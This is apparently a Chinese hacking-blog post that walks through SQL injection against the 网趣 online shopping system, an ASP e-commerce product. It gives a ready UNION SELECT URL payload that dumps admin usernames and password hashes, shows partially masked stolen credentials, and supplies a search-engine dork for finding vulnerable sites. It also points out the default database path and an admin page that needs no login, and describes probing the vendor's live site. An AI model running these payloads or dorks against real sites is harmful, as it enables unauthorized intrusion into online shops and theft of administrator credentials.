西宁威势
今天周末,睡到中午才起床,刚上线,看到QQ好友辐射鱼给我留言,找我测试脚本漏洞。

辐射鱼 13:01:03
等我找个点.
辐射鱼 13:03:48
https://www.webshell.cc/price.asp?anid=62%20and%20exists%20(select%20*%20from%20cnhww)
辐射鱼 13:04:41
 表cnhww.为啥不支持 order by
辐射鱼 13:05:06
https://www.webshell.cc/price.asp?anid=62%20order%20by%201
辐射鱼 13:05:29
password/admin


    随后我手动测试了几下,发现漏洞确实存在,我跟他要了源码和数据库,看完以后理解起来就不是很难了,因为源码是这样写的:

price.asp

rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1


自己构造语句:

https://www.webshell.cc/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww


之后成功暴出用户名和密码。

商品序号 商品名称 会员价 当前库存 规格 规格参数
weih**cheye  15  7a57a5a7438**aac 36 23 查看详细
wei**cheye  15  b2ea44b2cf0**bdb 36 23 查看详细
纬**业  15  88121ef9c5a**5f9 36 23 查看详细


   上面信息因为包含敏感信息,所以马赛克了一下,用*代替了部份,因为是帮忙测试,所以到此处后我就告一段落,之后辐射鱼又将此过程总结了一下,写了一篇文章,我直接贴上来,有兴趣的自己研究吧!

网趣网上购物系统时尚版 V最新

源码我大致看了下.前台一般不存在什么注入.数据库的默认后串为.asp,可以考虑在前台注册用户用户给数据库里面插马.

我的思路:.

1.       分析源码.

2.       数据库中插马.

3.       寻找上传之类的文件分析.

4.       后台的利用分析.

…………………………………………

本地架设个iis.测试下看看.

我们随便提交个id ‘看看存在不存在注入.

提交ID=XXX‘返回主页.

Products.asp

<html>

<head>

<!--#include file="conn.asp"-->

<!--#include file="config.asp"-->

<!--#include file="./alipay_inc/myAlipay.asp"-->

<!--#include file="./alipay_inc/alipay_Config.asp"-->

<title><%=webname%>--商品详细信息</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<meta name="description" content="网趣网上购物系统,网趣网上购物系统时尚版,网趣购物系统,网上购物系统,购物系统,网趣购物,商城源码,网上商店,网上商店系统,域名注册,虚拟主机,恒伟网络">

<meta name="keywords" content="网趣网上购物系统,网趣网上购物系统时尚版,网趣购物系统,网上购物系统,购物系统,网趣购物,商城源码,网上商店,网上商店系统,域名注册,虚拟主机,恒伟网络">

<link href="images/css.css" rel="stylesheet" type="text/css">

</head>

<script language="JavaScript">

       <!--

       function OpenNews()

       {

                     window.name = "news"

                     win = window.open('','newswin','left=110,width=600,height=420,scrollbars=1');

       }

       //-->

       </script>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" >

<%if IsNumeric(request.QueryString("id"))=False then

response.write("<script>alert(""非法访问!"");location.href=""index.asp"";</script>")

response.end

end if

dim id

id=request.QueryString("id")

if not isinteger(id) then

response.write"<script>alert(""非法访问!"");location.href=""index.asp"";</script>"

end if%>

<%dim bookid,action

bookid=request.QueryString("id")

action=request.QueryString("action")

if action="save" then

set rs=server.CreateObject("adodb.recordset")

rs.open "select * from review",conn,1,3

rs.addnew

rs("bookid")=bookid

rs("pingji")=request("pingji")

rs("pinglunname")=HTMLEncode2(trim(request("pinglunname")))

rs("pingluntitle")=HTMLEncode2(trim(request("pingluntitle")))

rs("pingluncontent")=HTMLEncode2(trim(request("pingluncontent")))

rs("ip")=Request.servervariables("REMOTE_ADDR")

rs("pinglundate")=now()

rs("shenhe")=0

rs.update

rs.close

set rs=nothing

set rs=server.CreateObject("adodb.recordset")

rs.open "select * from products where bookid="&bookid,conn,1,3

rs("pingji")=rs("pingji")+1

rs("pingjizong")=rs("pingjizong")+request("pingji")

rs.update

rs.close

set rs=nothing

response.Write "

<script language=javascript>alert('您的评论已成功提交,待管理员审核!');history.go(-1);</script>"

response.End

end if

%>

有防注入.

都是session验证,没有cookie这条路子我也测试了.不行

继续看代码.

Price.asp

<!--#include file="conn.asp"-->

<!--#include file="config.asp"-->

<html>

<head>

<title><%=webname%></title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<meta name="description" content="<%=des%>">

<meta name="keywords" content="<%=keya%>">

…………省略

nd if

set rs=server.CreateObject("adodb.recordset")

if anid<>"" then

rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

else

select case selectm

case ""

rs.open "select * from products order by adddate desc",conn,1,1

case "0"

rs.open "select * from products order by adddate desc",conn,1,1

case "shopid"

end select

end if

if err.number<>0 then

response.write "暂无相关数据!"

end if

if rs.eof And rs.bof then

Response.Write "<p align='center'>暂无相关数据!</p>"

else

totalPut=rs.recordcount

if currentpage<1 then

currentpage=1

end if

if (currentpage-1)*MaxPerPage>totalput then

if (totalPut mod MaxPerPage)=0 then

currentpage= totalPut \ MaxPerPage

else

currentpage= totalPut \ MaxPerPage + 1

end if

end if

if currentPage=1 then

showContent

showpage totalput,MaxPerPage,"Price.asp"

else

if (currentPage-1)*MaxPerPage<totalPut then

rs.move  (currentPage-1)*MaxPerPage

dim shopmark

shopmark=rs.bookmark

showContent

showpage totalput,MaxPerPage,"Price.asp"

else

currentPage=1

showContent

showpage totalput,MaxPerPage,"Price.asp"

end if

end if

end if

sub showContent

dim i

i=0

%>

没有防过滤.

Price.asp?anid=62;(提交查询语句)--

/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

/admin/admin.asp

/admin/admin3.asp

<html><head><title>商城管理系统</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<link href="../images/css.css" rel="stylesheet" type="text/css">

</head>

<body>

<%

Dim theInstalledObjects(24)

没有验证可以直接访问.

2.数据库.

\cnhwwdata\cnhww.asp 默认的数据库路径.

思路: 如果数据库路径没修改,可以考虑在前台注册用户拿shell.

<%nodown%> 防下载表段.

Cnhww 后台用户表段.

User 前台用户表段.

这里不用说了吧.防下载表段在插到数据库的第一个行.数据库插马这条路子就不走了

.(前台插入一句话也不会闭合)

1.       后台拿shell.

没有防过滤.

Price.asp?anid=62;(提交查询语句)--

语句就不构造了.

查询Cnhww 表里面的

Admin /password

后台拿shell的方法

网趣网上购物系统时尚版

关键字

inurl:Price.asp?anid=

利用方法

/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,

password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

拿到官方网站去测试,结果发现用了通用防注入

以下是引用片段:
非法操作!系统做了如下记录↓
操作IP:123.45.67.89

操作时间:2009-11-7 15:31:35
操作页面:/fshop/products.asp
提交方式:GET
提交参数:id
提交数据:346 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,

33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from cnhww order by adddate desc


辐射鱼接着测试,发现,官方将后台删除了,并且数据库表名也改了,哈哈,我就不接着玩了。

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/148.html